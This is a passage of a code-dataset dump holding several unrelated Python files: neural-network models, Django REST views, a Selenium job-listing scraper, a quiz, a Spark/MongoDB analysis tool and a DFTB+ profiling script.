pad=1)\n h = F.relu(self.conv3(h))\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=4, pad=1)\n h = F.relu(self.conv4(h))\n\n h = FX.halo_exchange(self.comm, h, k_size=3, index=5, pad=1)\n h = F.relu(self.conv5(h))\n h = F.max_pooling_2d(h, ksize=3, stride=2)\n hs = chainermnx.functions.spatialallgather(self.comm, h)\n h = F.concat(hs, -2)\n\n h = F.dropout(F.relu(self.fc6(h)))\n h = F.dropout(F.relu(self.fc7(h)))\n h = self.fc8(h)\n\n # loss = F.softmax_cross_entropy(h, t)\n # chainer.report({'loss': loss, 'accuracy': F.accuracy(h, t)}, self)\n # return loss\n return h\n\n\n\n\n","sub_path":"hybrid_2/models/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117488635","text":"from rest_framework.decorators import api_view,permission_classes\nfrom rest_framework.permissions import IsAuthenticated,IsAuthenticatedOrReadOnly\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import generics\n\nfrom neighbourhood.models import *\nfrom account.serializers import *\nfrom 
neighbourhood.serializers import *\n\n@api_view(['GET','POST'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef neighbour_view(request):\n    data = {}\n\n    if request.method == 'GET':\n        neighbourhoods = Neighbourhood.objects.all()\n        data = GetNeighbourhoodSerializer(neighbourhoods,many=True).data\n        \n        return Response(data,status = status.HTTP_200_OK)\n\n    elif request.method == 'POST':\n        serializer = NeighbourhoodSerializer(data = request.data)\n        if serializer.is_valid():\n            serializer.save(request)\n            data['success'] = \"The neighbourhood was created successfully\"\n            return Response(data,status = status.HTTP_201_CREATED)\n\n        else:\n            data = serializer.errors\n            return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\nclass LocationList(generics.ListAPIView):\n    queryset = Location.objects.all()\n    serializer_class = LocationSerializer\n    permission_classes = [IsAuthenticated]\n\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef join_neighbourhood(request,pk):\n    data = {}\n    profile = Profile.objects.get(user = request.user)\n    neighbourhood = Neighbourhood.objects.get(pk=pk)\n    profile.neighbourhood = neighbourhood\n    profile.save()\n    data['success'] = f\"You successfully joined {neighbourhood.slogan}\"\n    return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef move_out(request):\n    data = {}\n    profile = Profile.objects.get(user = request.user)\n    profile.neighbourhood = None\n    profile.save()\n    data['success'] = \"You are no longer a member of the neighbourhood!\"\n    return Response(data,status = status.HTTP_200_OK)\n\n\n\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_neighbourhood(request):\n    data = {}\n    profile = Profile.objects.get(user = request.user)\n    print(profile.neighbourhood)\n    data = ProfileSerializer(profile).data\n    return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['GET','POST'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef business_view(request):\n    data ={}\n\n    if request.method == 'GET':\n        businesses = Business.objects.all()\n        data = BusinessSerializer(businesses,many=True).data\n\n        return Response(data,status = status.HTTP_200_OK)\n\n    elif request.method == 'POST':\n        serializer = BusinessSerializer(data = request.data)\n        if serializer.is_valid():\n            serializer.save(request)\n            data['success'] = \"The business was created successfully\"\n\n            return Response(data,status = status.HTTP_201_CREATED)\n\n        else:\n            data = serializer.errors\n            return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\n@api_view(['POST','GET'])\n@permission_classes([IsAuthenticatedOrReadOnly])\ndef occurence_view(request,pk):\n    data = {}\n\n    try:\n        neighbourhood = Neighbourhood.objects.get(pk=pk)\n    except Neighbourhood.DoesNotExist:\n        data['not found'] = \"The neighbourhood was not found\"\n        return Response(data,status = status.HTTP_404_NOT_FOUND)\n\n    if request.method == 'POST':\n        serializer = OccurrenceSerializer(data = request.data)\n\n        if serializer.is_valid():\n            serializer.save(request,neighbourhood)\n            data['success'] = \"The occurrence was successfully reported\"\n            return Response(data,status = status.HTTP_200_OK)\n\n        else:\n            data = serializer.errors\n            print(data)\n            return Response(data,status = status.HTTP_400_BAD_REQUEST)\n\n    elif request.method == 'GET':\n        events = Occurrence.get_events(pk)\n        data = OccurrenceSerializer(events,many=True).data\n\n        return Response(data,status= status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_businesses(request,pk):\n
\"\"\"The view for getting all businesses in a neighbourhood\n\n Args:\n request ([type]): [description]\n pk ([type]): [description]\n \"\"\"\n businesses = Business.get_bussinesses(pk)\n data = {}\n data['businesses'] = BusinessSerializer(businesses,many=True).data\n\n return Response(data,status.HTTP_200_OK)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_residents(request,pk):\n \"\"\"This parses the request to get the users in a certain neighbourhood\n\n Args:\n request ([type]): [description]\n pk ([type]): [description]\n \"\"\"\n data = {}\n users = Profile.get_residents(pk)\n\n data['users'] = UserSerializer(users,many=True).data\n return Response(data,status = status.HTTP_200_OK)\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef search_business(request,term):\n \"\"\"This parses the view request for getting the businesses via a search term\n\n Args:\n request ([type]): [description]\n \"\"\"\n data = {}\n\n results = Business.search_by_name(term)\n\n data['businesses'] = BusinessSerializer(results,many=True).data\n return Response(data,status=status.HTTP_200_OK)\n\nclass EventTypeList(generics.ListAPIView):\n queryset = EventType.objects.all()\n serializer_class = EventSerializer\n permission_classes=[IsAuthenticated]\n\nclass ServiceList(generics.ListAPIView):\n queryset = Services.objects.all()\n serializer_class = ServiceSerializer\n permission_classes = [IsAuthenticated]","sub_path":"neighbourhood/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"228046324","text":"import torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom operations import *\r\nfrom torch.autograd import Variable\r\nfrom genotypes import PRIMITIVES\r\n# from utils.darts_utils import drop_path, compute_speed, compute_speed_tensorrt\r\nfrom pdb import set_trace as bp\r\nimport numpy as np\r\nfrom thop import profile\r\nfrom matplotlib import pyplot as plt\r\nfrom util_gan.vgg_feature import VGGFeature\r\nfrom thop import profile\r\n\r\n\r\ndef make_divisible(v, divisor=8, min_value=3):\r\n \"\"\"\r\n forked from slim:\r\n https://github.com/tensorflow/models/blob/\\\r\n 0344c5503ee55e24f0de7f37336a6e08f10976fd/\\\r\n research/slim/nets/mobilenet/mobilenet.py#L62-L69\r\n \"\"\"\r\n if min_value is None:\r\n min_value = divisor\r\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\r\n # Make sure that round down does not go down by more than 10%.\r\n if new_v < 0.9 * v:\r\n new_v += divisor\r\n return new_v\r\n\r\n# https://github.com/YongfeiYan/Gumbel_Softmax_VAE/blob/master/gumbel_softmax_vae.py\r\ndef sample_gumbel(shape, eps=1e-20):\r\n U = torch.rand(shape)\r\n U = U.cuda()\r\n return -torch.log(-torch.log(U + eps) + eps)\r\n\r\n\r\ndef gumbel_softmax_sample(logits, temperature=1):\r\n y = logits + sample_gumbel(logits.size())\r\n return F.softmax(y / temperature, dim=-1)\r\n\r\n\r\ndef gumbel_softmax(logits, temperature=1, hard=False):\r\n \"\"\"\r\n ST-gumple-softmax\r\n input: [*, n_class]\r\n return: flatten --> [*, n_class] an one-hot vector\r\n \"\"\"\r\n y = gumbel_softmax_sample(logits, temperature)\r\n \r\n if not hard:\r\n return y\r\n\r\n shape = y.size()\r\n _, ind = y.max(dim=-1)\r\n y_hard = torch.zeros_like(y).view(-1, shape[-1])\r\n y_hard.scatter_(1, ind.view(-1, 1), 1)\r\n y_hard = y_hard.view(*shape)\r\n # Set gradients w.r.t. y_hard gradients w.r.t. 
y\r\n y_hard = (y_hard - y).detach() + y\r\n return y_hard\r\n\r\n\r\nclass MixedOp(nn.Module):\r\n def __init__(self, C_in, C_out, op_idx, quantize, stride=1):\r\n super(MixedOp, self).__init__()\r\n self._op = OPS[PRIMITIVES[op_idx]](C_in, C_out, stride, slimmable=False, width_mult_list=[1.])\r\n self.quantize = quantize\r\n\r\n def forward(self, x):\r\n return self._op(x, quantize=self.quantize)\r\n\r\n def forward_latency(self, size):\r\n # int: force #channel; tensor: arch_ratio; float(<=1): force width\r\n latency, size_out = self._op.forward_latency(size)\r\n return latency, size_out\r\n\r\n def forward_flops(self, size):\r\n # int: force #channel; tensor: arch_ratio; float(<=1): force width\r\n flops, size_out = self._op.forward_flops(size, quantize=self.quantize)\r\n\r\n return flops, size_out\r\n\r\n\r\nclass SingleOp(nn.Module):\r\n def __init__(self, op, C_in, C_out, kernel_size=3 , stride=1, quantize=True):\r\n super(SingleOp, self).__init__()\r\n self._op = op(C_in, C_out, kernel_size=kernel_size, stride=stride, slimmable=False, width_mult_list=[1.])\r\n self.quantize = quantize\r\n\r\n def forward(self, x):\r\n result = self._op(x, quantize=self.quantize)\r\n\r\n return result\r\n\r\n def forward_flops(self, size):\r\n flops, size_out = self._op.forward_flops(size, quantize=self.quantize)\r\n\r\n return flops, size_out\r\n\r\n\r\n\r\nclass NAS_GAN_Eval(nn.Module):\r\n def __init__(self, alpha, beta, ratio, beta_sh, ratio_sh, layers=16, width_mult_list=[1.,], width_mult_list_sh=[1.,], quantize=True):\r\n super(NAS_GAN_Eval, self).__init__()\r\n assert layers >= 3\r\n self._layers = layers\r\n self._width_mult_list = width_mult_list\r\n self._width_mult_list_sh = width_mult_list_sh\r\n self._flops = 0\r\n self._params = 0\r\n\r\n self.len_stem = 3\r\n self.len_header = 3\r\n self.len_beta_sh = self.len_stem + self.len_header\r\n self.len_ratio_sh = self.len_stem + self.len_header - 1\r\n\r\n op_idx_list = F.softmax(alpha, dim=-1).argmax(-1)\r\n\r\n if quantize == 'search':\r\n quantize_list = F.softmax(beta, dim=-1).argmax(-1) == 1\r\n quantize_list_sh = F.softmax(beta_sh, dim=-1).argmax(-1) == 1\r\n elif quantize:\r\n quantize_list = [True for _ in range(layers)]\r\n quantize_list_sh = [True for _ in range(beta_sh.size(0))] \r\n else:\r\n quantize_list = [False for _ in range(layers)]\r\n quantize_list_sh = [False for _ in range(beta_sh.size(0))]\r\n\r\n ratio_list = F.softmax(ratio, dim=-1).argmax(-1)\r\n ratio_list_sh = F.softmax(ratio_sh, dim=-1).argmax(-1)\r\n\r\n # Construct Stem\r\n self.stem = nn.ModuleList()\r\n self.stem.append(SingleOp(ConvNorm, 3, make_divisible(64*width_mult_list_sh[ratio_list_sh[0]]), 7, quantize=quantize_list_sh[0]))\r\n\r\n in_features = 64\r\n out_features = in_features*2\r\n\r\n for i in range(2):\r\n self.stem.append(SingleOp(ConvNorm, make_divisible(in_features*width_mult_list_sh[ratio_list_sh[i]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[i+1]]), 3, stride=2, quantize=quantize_list_sh[1+i]))\r\n in_features = out_features\r\n out_features = in_features*2\r\n\r\n # Construct Blocks\r\n self.cells = nn.ModuleList()\r\n for i in range(layers):\r\n if i == 0:\r\n self.cells.append(MixedOp(make_divisible(in_features * width_mult_list_sh[ratio_list_sh[self.len_stem-1]]), make_divisible(in_features * width_mult_list[ratio_list[i]]), op_idx_list[i], quantize_list[i]))\r\n else:\r\n self.cells.append(MixedOp(make_divisible(in_features * width_mult_list[ratio_list[i-1]]), make_divisible(in_features * 
width_mult_list[ratio_list[i]]), op_idx_list[i], quantize_list[i]))\r\n\r\n        # Construct Header\r\n        self.header = nn.ModuleList()\r\n\r\n        out_features = in_features//2\r\n        \r\n        self.header.append(SingleOp(ConvTranspose2dNorm, make_divisible(in_features*width_mult_list[ratio_list[self._layers-1]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[self.len_stem]]), 3, stride=2, quantize=quantize_list_sh[self.len_stem]))\r\n        \r\n        in_features = out_features\r\n        out_features = in_features//2\r\n        \r\n        self.header.append(SingleOp(ConvTranspose2dNorm, make_divisible(in_features*width_mult_list_sh[ratio_list_sh[self.len_stem]]), make_divisible(out_features*width_mult_list_sh[ratio_list_sh[self.len_stem+1]]), 3, stride=2, quantize=quantize_list_sh[self.len_stem+1]))\r\n\r\n        self.header.append(SingleOp(Conv, make_divisible(64*width_mult_list_sh[ratio_list_sh[self.len_stem+1]]), 3, 7, quantize=quantize_list_sh[self.len_stem+2]))\r\n        \r\n        self.tanh = nn.Tanh()\r\n\r\n\r\n    def forward(self, input):\r\n\r\n        out = input\r\n        for i, module in enumerate(self.stem):\r\n            out = module(out)\r\n\r\n        for i, cell in enumerate(self.cells):\r\n            out = cell(out)\r\n\r\n        for i, module in enumerate(self.header):\r\n            out = module(out)\r\n\r\n        out = self.tanh(out)\r\n\r\n        return out\r\n\r\n    \r\n    def forward_flops(self, size):\r\n        flops_total = []\r\n\r\n        for i, module in enumerate(self.stem):\r\n            flops, size = module.forward_flops(size)    \r\n            flops_total.append(flops)\r\n\r\n        for i, cell in enumerate(self.cells):\r\n            flops, size = cell.forward_flops(size)\r\n            flops_total.append(flops)\r\n\r\n        for i, module in enumerate(self.header):\r\n            flops, size = module.forward_flops(size)    \r\n            flops_total.append(flops)\r\n\r\n        return sum(flops_total)\r\n\r\n\r\n","sub_path":"AGD_ST/search/model_eval.py","file_name":"model_eval.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"234111547","text":"from selenium import webdriver\nfrom lxml import etree\nimport time\nimport pymongo\n\n\ndef parse_html():\n    # Open the first page and grab all the position URLs on it\n    driver = webdriver.Chrome()\n    url = 'https://www.lagou.com/jobs/list_python?city=%E4%B8%8A%E6%B5%B7&cl=false&fromSearch=true&labelWords=&suginput='\n    driver.get(url)\n    driver.maximize_window()\n    html = etree.HTML(driver.page_source)\n    liTags = html.xpath('//li[@data-positionid]')\n\n    while True:\n        for li in liTags:\n            # get positionid\n            positionId = li.xpath('./@data-positionid')[0]\n            print(positionId)\n\n            # Open the detail page and parse its data\n            parse_detail(driver, positionId)\n            print('-' * 40)\n        try:\n            # Click through to the next page\n            next_btn = driver.find_element_by_xpath(\"//span[@action='next']\")\n            next_btn.click()\n            time.sleep(0.5)\n            # Get the liTags of the new page and keep crawling in a loop\n            html = etree.HTML(driver.page_source)\n            liTags = html.xpath('//li[@data-positionid]')\n        except Exception:\n            print('over')\n            break\n\n\ndef parse_detail(driver, positionId):\n    url = 'https://www.lagou.com/jobs/{}.html'.format(positionId)\n\n    # Open the detail page in a new window\n    js = 'window.open(\"{}\")'.format(url)\n    driver.execute_script(js)\n    print(js)\n    time.sleep(1)\n    # Switch the driver handle to the new window\n    driver.switch_to_window(driver.window_handles[-1])\n\n    # Extract the data we need from the page\n    html = etree.HTML(driver.page_source)\n    position = {\n        'title': html.xpath(\"//span[@class='name']/text()\")[0],\n        'salary': html.xpath(\"//span[@class='salary']/text()\")[0],\n        'publish_time': str(html.xpath(\"//p[@class='publish_time']/text()\")[0]).split()[0],\n        'company': html.xpath(\"//div[@class='company']/text()\")[0],\n        'work_addr': ''.join(html.xpath(\"//div[@class='work_addr']/a/text()\")[0:-1])\n    }\n    # print(position)\n\n    # 4. insert data\n    mycol = conMongoDB()\n    x = mycol.insert_one(position)\n    print('{}: inserted successfully, id: {}'.format(positionId, x.inserted_id))\n\n    # When done, close this window\n    driver.close()\n    # Switch the handle back to the main window\n    driver.switch_to_window(driver.window_handles[0])\n\n\ndef conMongoDB():\n    # 1. Connect to the mongo service and return a client object\n    myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n    # 2. use db\n    mydb = myclient[\"qa\"]\n    # 3. use collection(table)\n    mycol = mydb[\"job\"]\n    return mycol\n\n\ndef main():\n    parse_html()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"advanced/爬虫/【12】selenium拉勾网实战.py","file_name":"【12】selenium拉勾网实战.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"344342835","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass Dot_Attn(nn.Module):\n    def __init__(self, hidden_size):\n        super(Dot_Attn, self).__init__()\n\n    def forward(self, decoder_hidden, encoder_outputs):\n        # decoder_hidden: [1, batch_size, hidden_size]\n        # encoder_outputs: [seq_len, batch_size, hidden_size]\n        seq_len = encoder_outputs.size(0)\n        batch_size = encoder_outputs.size(1)\n        hidden_size = encoder_outputs.size(2)\n\n        # dot product attention\n        # hidden: [batch_size, seq_len, hidden_size]\n        # encoder_outputs: [batch_size, seq_len, hidden_size]\n        # attention_weight: [batch_size, seq_len, hidden_size]\n        encoder_outputs = encoder_outputs.transpose(0, 1)\n        decoder_hidden = decoder_hidden.transpose(0, 1).repeat(1, seq_len, 1)\n        attention = encoder_outputs * decoder_hidden\n\n        # attention_weight: [batch_size, seq_len]\n        attention = torch.sum(attention, dim=2)\n        attention = F.softmax(attention, dim=1)\n\n        # attention_weight: [batch_size, seq_len, 1]\n        attention = attention.unsqueeze(2)\n\n        # context_vector: [batch_size, seq_len, hidden_size]\n        context = attention * encoder_outputs\n\n        # context: [batch_size, hidden_size]\n        context = torch.sum(context, dim=1)\n        # context: [1, batch_size, hidden_size]\n        context = context.unsqueeze(0)\n        return context\n\n\nclass Concat_Attn(nn.Module):\n    def __init__(self, hidden_size):\n        super(Concat_Attn, self).__init__()\n        self.attn = nn.Linear(2*hidden_size, hidden_size)\n        self.fc = nn.Linear(hidden_size, 1, bias=False)\n\n    def forward(self, decoder_hidden, encoder_outputs):\n        # decoder_hidden: [1, batch_size, hidden_size]\n        # encoder_outputs: [seq_len, batch_size, hidden_size]\n        seq_len = encoder_outputs.size(0)\n\n        # repeat decoder hidden state seq_len times\n        # hidden: [batch_size, seq_len, hidden_size]\n        # encoder_outputs: [batch_size, seq_len, hidden_size]\n        decoder_hidden = decoder_hidden.repeat(seq_len, 1, 1).permute(1, 0, 2)\n        encoder_outputs = encoder_outputs.permute(1, 0, 2)\n\n        # energy: [batch_size, seq_len, 2*hidden_size]\n        # energy: [batch_size, seq_len, hidden_size]\n        energy = torch.cat((decoder_hidden, encoder_outputs), dim=2)\n        energy = self.attn(energy)\n        energy = torch.tanh(energy)\n\n        # attention: [batch_size, seq_len, 1]\n        # attention: [batch_size, seq_len]\n        attention = self.fc(energy)\n        attention = attention.squeeze(2)\n        attention = F.softmax(attention, dim=1)\n\n        # attn_weights: [batch_size, 1, seq_len]\n        attention = attention.unsqueeze(1)\n\n        # context: [batch_size, 1, hidden_size]\n        context = attention.bmm(encoder_outputs)\n\n        # context: [1, batch_size, hidden_size]\n        context = context.permute(1, 0, 2)\n        return context\n\n\nclass General_Attn(nn.Module):\n    def __init__(self, hidden_size):\n        super(General_Attn, self).__init__()\n        self.attn = nn.Linear(hidden_size, hidden_size)\n\n    def forward(self, decoder_hidden, encoder_outputs):\n        # decoder_hidden: [1, batch_size, hidden_size]\n        # encoder_outputs: [seq_len, batch_size, hidden_size]\n\n        # decoder_hidden: [batch_size, 1, hidden_size]\n        # encoder_outputs: [batch_size, seq_len, hidden_size]\n        # attention: [batch_size, seq_len, hidden_size]\n        decoder_hidden = decoder_hidden.transpose(0, 1)\n        encoder_outputs = encoder_outputs.transpose(0, 1)\n        attention = self.attn(encoder_outputs)\n\n        # attention: [batch_size, seq_len]\n        attention = torch.sum(decoder_hidden * attention, dim=2)\n        attention = F.softmax(attention, dim=1)\n\n        # attention: [batch_size, 1, seq_len]\n        attention = attention.unsqueeze(1)\n\n        # context: [batch_size, 1, hidden_size]\n        context = attention.bmm(encoder_outputs)\n\n        # context: [1, batch_size, hidden_size]\n        context = context.permute(1, 0, 2)\n        return context\n","sub_path":"seq2seq_attention2/attention.py","file_name":"attention.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"599425315","text":"import os\r\nfile = open(\"start.txt\",\"r\").read()\r\nquestion, score = open(\"questions.txt\",\"r\").readlines(), 0\r\nfor i in range(int(len(question)/6)):\r\n    print(\"\\n\"*8,*file % (i+1),*question[i*6:(i*6)+5],sep=\"\")\r\n    if i == 3:\r\n        os.system(\"start img/Death.png\") \r\n    elif i == 10:\r\n        os.system(\"start img/Logo.png\")\r\n    user = input(\">>> \")\r\n    while not user in [\"1\",\"2\",\"3\",\"4\"]:\r\n        user = input(\"Incorrect Input!\\n>>> \")\r\n    if user == question[(i*6)+5][0]:\r\n        score += 1\r\nif score <= int(int(len(question)/6)/2):\r\n    print(open(\"bad.txt\",\"r\").read())\r\nelse:\r\n    print(open(\"welldone.txt\",\"r\").read())\r\nprint(\"You scored\",str(score)+\"/\"+str(int(len(question)/6))),input()\r\n","sub_path":"Python/PYTHONchallenges/Python/Python/challenges/quiz/Harry Potter/Harry_potter_quiz.py","file_name":"Harry_potter_quiz.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"298837837","text":"import pandas as pd\n# Due to specifics of installation on my machine\n# these lines need to be executed before importing Spark\n# Feel free to comment them out or delete them\n#################\nimport findspark\nfindspark.init()\n#################\nfrom pyspark.sql import SparkSession\nfrom src.spark_queries import QuestionAnswerer\nfrom src.mongoimport import MongoImportDF\nfrom pymongo import MongoClient\n\nmongo_uri = \"mongodb://localhost:27017/\"\ncollection_name = \"final_collection\"\ndb_name = \"final_db\"\nmongodb_input_uri = \"mongodb://127.0.0.1/\" + db_name + '.' + collection_name\nmongodb_output_uri = \"mongodb://127.0.0.1/\" + db_name + '.' + collection_name\nxslx_name = 'Online Retail.xlsx'\nsave_directory = 'Output'\n\n# Utility functions used to generate interactive interface\n# for each of the questions\n\n\ndef message():\n    print('Press question number, \\'l\\' to list questions or \\'q\\' to quit\\n')\n\n\ndef list_question():\n    print('Question 1: Group all transactions by invoice \\n')\n    print('Question 2: Which product sold the most? \\n')\n    print('Question 3: Which customer spent the most money? 
\\n')\n print('Question 4: A chart showing the distribution of each product\\\n for each of the available countries')\n print('Question 5: What is the average unit price?')\n print('Question 6: A chart showing the distribution of prices')\n print('Question 7: The ratio between price and quantity for each invoice')\n\n\ndef question_1(qa):\n print('Question 1: Group all transactions by invoice \\n')\n print('Cant display grouped data :(')\n print(qa.group_by_invoice())\n\n\ndef question_2(qa):\n print('Question 2: Which product sold the most? \\n')\n print('The product(s) with StockCode(s) {} sold the most'\n .format(qa.the_most_sold_product()))\n\n\ndef question_3(qa):\n print('Question 3: Which customer spent the most money? \\n')\n print('The customer(s) with CustomerID(s) {} spent the most money'\n .format(qa.customer_spent_the_most))\n\n\ndef question_4(qa, save=False, show=False):\n print('Question 4: A chart showing the distribution of each product\\\n for each of the available countries')\n print('Description (d) or StockCode? (s)\\n')\n answer = input()\n if answer not in ['d', 's']:\n raise Exception('Invalid Answer!\\n')\n if answer == 'd':\n column = 'Description'\n else:\n column = 'StockCode'\n print('Input {}\\n'.format(column))\n product = input()\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.product_by_country_distribution(product, column, save, show)\n print('Done')\n\n\ndef question_5(qa):\n print('Question 5: What is the average unit price?')\n print('Description (d) or StockCode? (s)\\n')\n answer = input()\n if answer not in ['d', 's']:\n raise Exception('Invalid Answer!\\n')\n if answer == 'd':\n column = 'Description'\n else:\n column = 'StockCode'\n qa.avg_unit_price(column).show()\n\n\ndef question_6(qa, save=False, show=False):\n print('Question 6: A chart showing the distribution of prices')\n column = input()\n print('Description, InvoiceNo, Country or StockCode?\\n')\n print('Input {}\\n'.format(column))\n name = input()\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.price_distribution(column, name, save, show)\n\n\ndef question_7(qa, save=False, show=False):\n print('Question 7: The ratio between price and \\\n quantity for each invoice')\n print('Input InvoiceNo\\n')\n invoice_no = int(input())\n print('Save(s), show(w) the chart or both (sw)?\\n')\n answer = input()\n if 's' in answer:\n save = True\n if 'w' in answer:\n show = True\n qa.price_quantity_ratio(invoice_no, save, show)\n\n\nif __name__ == \"__main__\":\n #The MongoDB import part starts here\n print('Connecting to MongoDB...\\n')\n my_client = MongoClient(mongo_uri)\n print('Connected\\n')\n print('Reading xslx...')\n df = pd.read_excel(xslx_name, engine='openpyxl')\n print('Read!')\n midf = MongoImportDF(df, my_client, db_name, collection_name)\n print('Started import of dataframe into MongoDB...')\n midf.mongo_import()\n print('Import finished, database \"{}\", collection \"{}\"\\n'\n .format(db_name, collection_name))\n # The MongoDB import part starts here\n # The Spark Part starts here\n print('Creating Spark Session...\\n')\n my_spark = SparkSession \\\n .builder \\\n .appName(\"OnlineRetail\") \\\n .config(\"spark.mongodb.input.uri\",\n mongodb_input_uri) \\\n .config(\"spark.mongodb.output.uri\",\n mongodb_output_uri) \\\n .config(\"spark.jars.packages\",\n 
\"org.mongodb.spark:mongo-spark-connector_2.12:3.0.0\")\\\n .getOrCreate()\n print('Spark session created\\n')\n print('Creating Spark dataframe from MongoDB...\\n')\n spark_df = my_spark.read.format(\"mongo\").load()\n print('Spark dataframe created\\n')\n qa = QuestionAnswerer(spark_df)\n # The Spark Part ends here. The queries can be executed by directly calling\n # the methods of QuestionAnswerer\n command = 'l'\n\n switcher = {\n '1': question_1,\n '2': question_2,\n '3': question_3,\n '4': question_4,\n '5': question_5,\n '6': question_6,\n '7': question_7\n }\n\n while command != 'q':\n message()\n command = input()\n if command == 'l':\n list_question()\n else:\n switcher.get(command, 'Wrong Input!')(qa)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"602242855","text":"\"\"\"\nGiven a sorted integer array without duplicates, return the summary of its ranges.\nidea: 2 ptr, print_range\ncomp: O(n)\n\"\"\"\n\n\ndef summary_ranges(arr):\n if not arr:\n return []\n res, left, right = [], 0, 0\n while right < len(arr) - 1:\n if arr[right] + 1 != arr[right + 1]:\n res.append(format_range(arr[left], arr[right]))\n left = right + 1\n right += 1\n res.append(format_range(arr[left], arr[right]))\n return res\n\n\ndef format_range(l, r):\n if l == r:\n return str(l)\n else:\n return str(l) + \"->\" + str(r)\n\n\narr = [0, 1, 2, 4, 5, 7]\nexpected = [\"0->2\", \"4->5\", \"7\"]\nactual = summary_ranges(arr)\nprint(expected == actual)\n\narr = [0, 2, 3, 4, 6, 8, 9]\nexpected = [\"0\", \"2->4\", \"6\", \"8->9\"]\nactual = summary_ranges(arr)\nprint(expected == actual)\n","sub_path":"other/prgcrk/array_string/pointers/summary_ranges.py","file_name":"summary_ranges.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"552604050","text":"# 1) Call profile_dftb with the input molecule\n# 2) Manually edit the dftb_in.hsd file for the input specifications\n# 3) Set Input method properly because it is used to construct the folder name where results get stored\n# 4) Set iteration count to the no. of times you want to simulate and profile\n# 5) Result directory is the one where the result folders would be saved\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport gc\nimport os\n\nInput_method = 'QR' # The eigensolver routine present in the input file\nIteration_count = 10 # Number of times for profiling the source code w.r.t. 
the same input file\nResult_directory = 'gpu_utilization_testing/'\nInput_list = '2ndInput.txt' # The file containing the list of molecules for which you want to run your simulation\n\n\ndef profile_dftb(molname):\n Input = molname # The name of the input molecule whose corresponding xyz file is present in the directory\n\n # Converting the input xyz file to gen format which will be placed in the dftb_in.hsd file.\n read_file = Input + '.xyz'\n write_file = 'geo.gen'\n fp_read = open(read_file, \"r\")\n fp_write = open(write_file, \"w\")\n count = 1\n linecount = 1\n for ln in fp_read:\n ln = ln.replace('\\n', '')\n words = ln.split(' ')\n words = list(filter(None, words))\n # print(words)\n if linecount == 1:\n fp_write.write(ln + ' C\\n')\n fp_write.write('C H\\n')\n if linecount > 2:\n if len(words) > 2:\n if words[0] == 'C':\n fp_write.write('\\t' + str(count) + '\\t1\\t' + str(words[1]) + '\\t' + str(words[2]) + '\\t'\n + str(words[3]) + '\\n')\n count = count + 1\n else:\n fp_write.write('\\t' + str(count) + '\\t2\\t' + str(words[1]) + '\\t' + str(words[2]) + '\\t'\n + str(words[3]) + '\\n')\n count = count + 1\n del words[:]\n linecount = linecount + 1\n fp_read.close()\n fp_write.close()\n\n # Executing the source code\n for i in range(0, Iteration_count):\n Output_directory = Result_directory + Input + '_' + Input_method + '_' + str(i+1)\n command = 'mkdir ' + Output_directory\n os.system(command)\n run_dftb = 'dftb+/dftb+ dftb_in.hsd'\n print(str(i+1) + ') ' + run_dftb)\n os.system(run_dftb)\n\n # Profiling the source code\n profile_dftb = 'gprof dftb+/dftb+ > ProfilingReport_' + Input + '_' + str(i+1)\n print(str(i + 1) + ') ' + profile_dftb)\n os.system(profile_dftb)\n\n # Moving the output files to the output directory\n command = 'mv ProfilingReport_' + Input + '_' + str(i + 1) + ' ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp band.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp detailed.out ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp dftb_in.hsd ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp ' + Input + '.xyz ' + Output_directory\n print(command)\n os.system(command)\n command = 'cp dftb_pin.hsd ' + Output_directory\n print(command)\n os.system(command)\n 